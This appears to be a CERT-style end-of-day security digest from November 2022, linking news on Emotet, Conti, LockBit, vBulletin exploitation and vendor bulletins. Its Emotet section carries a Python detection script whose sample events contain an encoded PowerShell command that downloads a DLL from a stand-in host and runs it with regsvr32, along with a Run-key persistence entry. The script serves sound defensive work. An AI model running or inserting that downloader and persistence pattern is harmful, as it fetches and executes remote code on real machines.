End-of-Day report
Timeframe: Friday 25-11-2022 18:00 - Monday 28-11-2022 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Thomas Pribitzer
News
Win32.Ransom.Conti / Crypto Logic Flaw
Conti ransomware fails to encrypt non-PE files that have ".exe" in the filename.
https://cxsecurity.com/issue/WLB-2022110044
Bring Your Own Key - A Placebo?
BYOK was envisioned to reduce the risk of using a cloud service provider processing sensitive data, yet there are several deficiencies.
https://www.darkreading.com/cloud/bring-your-own-key-a-placebo-
All You Need to Know About Emotet in 2022
For six months, the infamous Emotet botnet has shown almost no activity, and now it is distributing malicious spam again. Let's dive into the details and discuss all you need to know about the notorious malware to combat it.
https://thehackernews.com/2022/11/all-you-need-to-know-about-emotet-in.html
Hacking Smartwatches for Spear Phishing
In this article we explain how to hack into a smartwatch and make it display a custom text message.
https://cybervelia.com/?p=1380
Exploiting an N-day vBulletin PHP Object Injection Vulnerability
vBulletin is one of the most popular proprietary forum solutions on the Internet. It is used by some major websites, and according to the BuiltWith website, vBulletin currently ranks second in the Forum Software Usage Distribution in the Top 1 Million Sites, with over 2,000 websites using it among the top 1 million.
https://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection
Poking a mobile hotspot
I've been playing with an Orbic Speed, a relatively outdated device that only speaks LTE Cat 4, but the towers I can see from here are, uh, not well provisioned so throughput really isn't a concern (and refurbs are $18, so). As usual I'm pretty terrible at just buying devices and using them for their intended purpose, and in this case it has the irritating behaviour that if there's a power cut and the battery runs out it doesn't boot again when power returns, so here's what I've learned so far.
https://mjg59.dreamwidth.org/61725.html
Beware of fake FinanzOnline e-mail
"You are receiving a payment" is the subject of a fraudulent e-mail that supposedly comes from FinanzOnline. You are informed that you will receive a refund of 578.99 euros. To get the money, you have to click on the link in the e-mail. Beware: it leads to a fake FinanzOnline page. Criminals steal your data.
https://www.watchlist-internet.at/news/vorsicht-vor-gefaelschtem-finanzonline-e-mail/
Emotet Strikes Again - LNK File Leads to Domain Wide Ransomware
The intrusion began when a user double-clicked a LNK file, which then executed encoded PowerShell commands to download an Emotet DLL onto the computer. Once executed, Emotet set up a Registry Run key to maintain persistence on the beachhead host.
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
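The chain described above (LNK double-click, encoded PowerShell download, DLL execution, Run key persistence) maps onto three telemetry events that can be correlated per host. The following is an added example written for this report, not code from The DFIR Report; it runs over constructed Sysmon-style process-create and registry-set records (field names, hostnames, paths and the use of regsvr32 as the DLL loader are assumptions for illustration). It decodes the -EncodedCommand payload the way PowerShell does (base64 of UTF-16LE), flags a DLL launched from a user-writable path, flags a Run key pointing at that DLL, and reports hosts where all three stages appear.

```python
"""Correlate the Emotet LNK -> encoded PowerShell -> DLL -> Run key chain in sample telemetry."""
import base64
import re


def encode_ps(command: str) -> str:
    """Encode a command the way PowerShell expects for -EncodedCommand (base64 of UTF-16LE)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample events modelled loosely on Sysmon process-create and registry-set
# records. They are illustrative only, not captured from a real intrusion.
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc " + encode_ps(
         "iwr http://example.invalid/x.dll -OutFile $env:TEMP\\x.dll; regsvr32 $env:TEMP\\x.dll")},
    {"host": "WS01", "type": "process",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe C:\Users\alice\AppData\Local\Temp\x.dll"},
    {"host": "WS01", "type": "registry", "image": r"C:\Windows\System32\regsvr32.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\x",
     "details": r"C:\Windows\System32\regsvr32.exe C:\Users\alice\AppData\Local\Temp\x.dll"},
    # Benign control: an admin running a script file from a console, no encoding, no DLL.
    {"host": "WS02", "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_RE = re.compile(r"(iwr|invoke-webrequest|downloadfile|downloadstring|net\.webclient|https?://)", re.I)
USER_PATH_RE = re.compile(r"\\(users|temp|appdata|programdata)\\.*\.dll", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
DLL_LOADER_RE = re.compile(r"\\(regsvr32|rundll32)\.exe$", re.I)

FULL_CHAIN = {"encoded_powershell_download", "dll_from_user_path", "run_key_persistence"}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify_event(ev: dict) -> list:
    """Return the chain stage(s) a single event matches (empty list if none)."""
    stages = []
    if ev["type"] == "process":
        decoded = decode_encoded_command(ev["cmdline"])
        # Stage 1: explorer.exe spawning PowerShell (LNK double-click) with an encoded downloader.
        if (decoded and ev["image"].lower().endswith("powershell.exe")
                and ev["parent"].lower().endswith("explorer.exe")
                and DOWNLOAD_RE.search(decoded)):
            stages.append("encoded_powershell_download")
        # Stage 2: a DLL loader started against a DLL in a user-writable location.
        if DLL_LOADER_RE.search(ev["image"]) and USER_PATH_RE.search(ev["cmdline"]):
            stages.append("dll_from_user_path")
    elif ev["type"] == "registry":
        # Stage 3: a Run/RunOnce value whose data points at that user-path DLL.
        if RUN_KEY_RE.search(ev["target"]) and USER_PATH_RE.search(ev["details"]):
            stages.append("run_key_persistence")
    return stages


def correlate(events: list) -> dict:
    """Map each host to the set of chain stages observed on it."""
    per_host = {}
    for ev in events:
        for stage in classify_event(ev):
            per_host.setdefault(ev["host"], set()).add(stage)
    return per_host


def hosts_with_full_chain(events: list) -> list:
    """Hosts on which every stage of the chain was observed."""
    return sorted(h for h, s in correlate(events).items() if FULL_CHAIN <= s)


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(host, sorted(stages))
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

Each stage on its own is noisy (encoded PowerShell and regsvr32 both have legitimate uses), so the useful alert is the per-host conjunction; in a real pipeline the same correlation would additionally be bounded by a time window and keyed on the DLL path shared between stages 2 and 3.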
LockBit Ransomware Being Mass-distributed With Similar Filenames
The ASEC analysis team has written about LockBit ransomware being distributed through emails in three blog posts. Through consistent monitoring, we hereby let you know that LockBit 2.0 and LockBit 3.0 are being distributed again with only a change to their filenames.
https://asec.ahnlab.com/en/42890/
Vulnerabilities
Security updates for Monday
Security updates have been issued by Debian (chromium, commons-configuration2, graphicsmagick, heimdal, inetutils, ini4j, jackson-databind, and varnish), Fedora (drupal7-i18n, grub2, kubernetes, and python-slixmpp), Mageia (botan, golang, kernel, kernel-linus, radare2/rizin, and xterm), Red Hat (krb5, varnish, and varnish:6), SUSE (busybox, chromium, erlang, exiv2, firefox, freerdp, ganglia-web, java-1_8_0-openj9, nodejs12, nodejs14, opera, pixman, python3, sudo, tiff, and xen), [...]
https://lwn.net/Articles/916135/
Cisco ISE Vulnerabilities Can Be Chained in One-Click Exploit
Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow remote attackers to inject arbitrary commands, bypass existing security protections, or perform cross-site scripting (XSS) attacks.
https://www.securityweek.com/cisco-ise-vulnerabilities-can-be-chained-one-click-exploit
Google Project Zero discloses vulnerability in Mali GPU, millions of Android devices affected
Google security researchers at Project Zero have disclosed a vulnerability (CVE-2022-33917) in the kernel driver of the Mali GPU used in many Android devices with ARM CPUs.
https://www.borncity.com/blog/2022/11/27/google-projekt-zero-legt-schwachstelle-in-mali-gpu-offen-millionen-android-gerte-betroffen/
Security Bulletin: IBM Maximo Mobile is vulnerable to Information Disclosure (CVE-2022-41732)
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-mobile-is-vulnerable-to-information-disclosure-cve-2022-41732/
Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect App Connect Professional.
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-sdk-affect-app-connect-professional-3/
Security Bulletin: IBM App Connect Enterprise Certified Container operands may be vulnerable to arbitrary code execution due to X-Force 237819
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-app-connect-enterprise-certified-container-operands-may-be-vulnerable-to-arbitrary-code-execution-due-to-x-force-237819/
MISP v2.4.166
https://github.com/MISP/MISP/releases/tag/v2.4.166